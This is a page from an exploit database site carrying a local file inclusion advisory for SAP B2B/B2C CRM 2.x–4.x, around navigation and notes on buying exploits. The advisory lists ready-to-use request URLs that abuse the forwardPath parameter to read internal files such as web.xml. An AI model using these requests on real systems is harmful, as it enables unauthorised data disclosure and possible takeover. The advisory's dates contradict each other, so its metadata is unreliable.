0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion Vulnerability
# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion # Application:SAP B2B OR B2C is CRM # Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b) # Vendor URL: http://SAP.com # Bugs: SAP LFI in B2B OR B2C CRM # Sent: 2018-05-03 # Reported: 2018-05-03 # Date of Public Advisory: 2018-02-09 # Reference: SAP Security Note 1870255656 # Author: Richard Alviarez # 1. VULNERABLE PACKAGES # SAP LFI in B2B OR B2C CRM v2.x to 4.x # Other versions are probably affected too, but they were not checked. # 2. TECHNICAL DESCRIPTION # A possible attacker can take advantage of this vulnerability # to obtain confidential information of the platform, # as well as the possibility of writing in the logs of the # registry in order to get remote execution of commands and take control of the system. # 3. Steps to exploit this vulnerability A. Open https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml Other vulnerable parameters: https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml page on SAP server B. Change parameter {name} for example icss_b2b or other name.... C. Change "/WEB-INF/web.xml" for other files or archives internal. # 4. Collaborators # - CuriositySec # - aDoN90 # - Vis0r # 0day.today [2024-12-24] #